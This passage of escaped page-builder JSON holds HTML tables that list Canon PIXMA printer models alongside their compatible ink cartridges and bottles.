<tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL 